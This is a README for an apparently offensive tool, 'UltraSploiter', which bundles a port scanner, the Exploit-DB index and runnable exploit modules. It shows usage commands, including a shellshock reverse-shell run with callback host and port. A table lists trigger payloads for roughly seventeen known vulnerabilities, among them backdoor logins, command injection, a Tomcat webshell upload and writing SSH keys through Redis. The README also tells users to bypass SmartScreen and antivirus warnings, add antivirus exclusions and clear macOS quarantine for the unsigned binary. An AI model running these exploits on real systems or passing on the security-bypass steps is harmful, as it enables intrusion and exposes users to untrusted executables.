A single binary that folds a port scanner, the full Exploit-DB index (47k entries) and runnable exploit modules into one tool. Written in Rust, runs on Linux, Windows and macOS.
scan, match, exploit — one IP in, shells out.
A single binary that folds a port scanner, the full Exploit-DB index, and a set of runnable exploit modules into one tool. Runs on Linux, Windows and macOS.
| job | normally | here |
|---|---|---|
| Find services on a host | nmap | UltraSploiter scan <ip> |
| Look up exploits | searchsploit | UltraSploiter search <kw> |
| Fire them | msfconsole | UltraSploiter exploit <ip> <module> |

The simplest and best way is to just grab the prebuilt binary and run it. Nothing to install, no dependencies — one self-contained file.
Download from the Releases page:
UltraSploiter-windows-x86_64.exe → double-clickUltraSploiter-linux-x86_64Heads-up: security tools get flagged. Windows SmartScreen and antivirus will likely warn or quarantine the binary — click More info → Run anyway, or add an exclusion if you're keeping it around.
Double-click UltraSploiter.exe. The menu opens.
If SmartScreen warns about an unknown publisher (it will, for any unsigned binary), click More info → Run anyway.
chmod +x UltraSploiter-linux-x86_64
./UltraSploiter-linux-x86_64
chmod +x UltraSploiter-macos-arm64
./UltraSploiter-macos-arm64
If Gatekeeper blocks it (again, any unsigned binary), either right-click → Open, or clear the quarantine flag once:
xattr -d com.apple.quarantine UltraSploiter-macos-arm64
Only needed if there's no binary for your platform, or you want to modify it. Rust 1.74+ is required.
sudo apt install build-essential # gcc + linker (Debian/Ubuntu)
git clone https://gitlab.com/vqkro/ultrasploiter
cd ultrasploiter
./build.sh # -> ./UltraSploiter
xcode-select --install # clang + linker
git clone https://gitlab.com/vqkro/ultrasploiter
cd ultrasploiter
./build.sh # -> ./UltraSploiter
git clone https://gitlab.com/vqkro/ultrasploiter
cd ultrasploiter
.\build.ps1 # -> UltraSploiter.exe
build.ps1 uses the stable-x86_64-pc-windows-gnu toolchain, which links with
MinGW — so you don't need Visual Studio or MSVC. It installs that toolchain
if it's missing. If you already have MSVC Build Tools, a plain
cargo build --release works too.
Windows + GNU heads-up:
windows-sys(pulled in by tokio) invokesdlltool, which shells out to the assembleras— and the rust-mingw component doesn't shipas.build.ps1looks for a MinGW bin that has it in%~dp0tools\mingw64\binand%USERPROFILE%\tools\mingw64\bin, and prepends it toPATHwhen found. Drop a winlibs build there if you hiterror calling dlltool. MSVC toolchains are unaffected.
With no arguments you get the menu:
1) Scan a target find open ports and services
2) Search exploits keyword lookup
3) List runnable modules
4) Run an exploit pick a target and a module
5) Console advanced msf-style commands
0) Exit
UltraSploiter scan 10.0.0.5 # top 1000 ports + fingerprint + suggestions
UltraSploiter scan 10.0.0.5 -p 1-1024 -T4 # range, fast timing
UltraSploiter scan 10.0.0.5 -p - # all 65535 ports
UltraSploiter scan 10.0.0.5 -sU # UDP scan
UltraSploiter scan 10.0.0.5 --json
UltraSploiter scan 10.0.0.5 -oX out.xml
UltraSploiter search samba
UltraSploiter info 17491
UltraSploiter show 17491 # print the PoC source for an Exploit-DB id
UltraSploiter modules
UltraSploiter msf search smb # bridge to Metasploit (needs it installed)
UltraSploiter exploit 10.0.0.5 vsftpd_234
UltraSploiter exploit 10.0.0.5 shellshock -o lhost=10.0.0.1 -o lport=4444
UltraSploiter console
On Linux/macOS, prefix with ./ (e.g. ./UltraSploiter scan 10.0.0.5).
| flag | meaning |
|---|---|
-p <spec> | top (1000), 80,443, 1-1024, - (all) |
-T0..-T5 | timing template — slower/quieter to faster/noisier |
-sU | UDP probe scan |
-sV | service/version detection (on by default) |
--no-banner | skip banner grabbing |
--json | JSON to stdout |
-oX <file> | nmap-style XML |
The scanner is asynchronous (tokio): each -T level sets how many sockets are in
flight at once (up to 8000 at -T5), so it covers the nmap top-1000 in a couple
of seconds. Every "open" is a completed TCP handshake, so results are exact.
-o key=value)| key | used by | meaning |
|---|---|---|
lhost, lport | rev-shell modules | callback address |
rport | web modules | override the HTTP port |
path | shellshock, struts, phpunit | endpoint path |
user, pass | tomcat_manager | manager credentials |
core | solr_rce | Solr core name |
file | grafana_lfi | file to read |
ssh_pubkey | redis_unauth | key to drop into authorized_keys |
src, dst | proftpd_modcopy | copy source / destination |
timeout | all | socket timeout seconds |
search and info are backed by the full Exploit-DB index — 47,000+ entries
(the same dataset searchsploit uses), bundled into the binary. When an entry
carries a CVE that a runnable module implements, info links the two:
$ UltraSploiter info 17491
Exploit-DB 17491
description vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)
codes OSVDB-73573;CVE-2011-2523
[runnable] vsftpd_234
UltraSploiter exploit <ip> vsftpd_234
| module | CVE | trigger |
|---|---|---|
vsftpd_234 | CVE-2011-2523 | :) username → root bind shell on 6200 |
unrealircd_backdoor | CVE-2010-2075 | AB; <cmd> over IRC |
distcc_exec | CVE-2004-2687 | DIST protocol compiler argument |
proftpd_modcopy | CVE-2015-3306 | SITE CPFR/CPTO file copy |
redis_unauth | — | CONFIG SET writes a key or cron entry |
shellshock | CVE-2014-6271 | User-Agent: () { :; }; <cmd> |
struts2_5638 | CVE-2017-5638 | OGNL in Content-Type |
tomcat_put | CVE-2017-12615 | PUT a JSP webshell |
tomcat_manager | — | deploy a WAR via /manager |
elasticsearch_groovy | CVE-2015-1427 | Groovy RCE in _search |
drupalgeddon2 | CVE-2018-7600 | Form API render callback |
phpunit_eval | CVE-2017-9841 | eval-stdin.php |
jenkins_script | CVE-2019-1003000 | unauthenticated /script Groovy |
solr_rce | CVE-2019-17558 | Velocity template in stream.body |
grafana_lfi | CVE-2021-43798 | plugin path traversal file read |
webmin_backdoor | CVE-2019-15107 | password_change.cgi pipes a value into a shell |
php_cgi_arg_injection | CVE-2012-1823 | -d auto_prepend_file via the query string |
Each implements a non-destructive check() and a run().
These are small JSON recipes run by the catalog engine in data/catalog.json.
Adding a module is ~8 lines of data, not a new source file: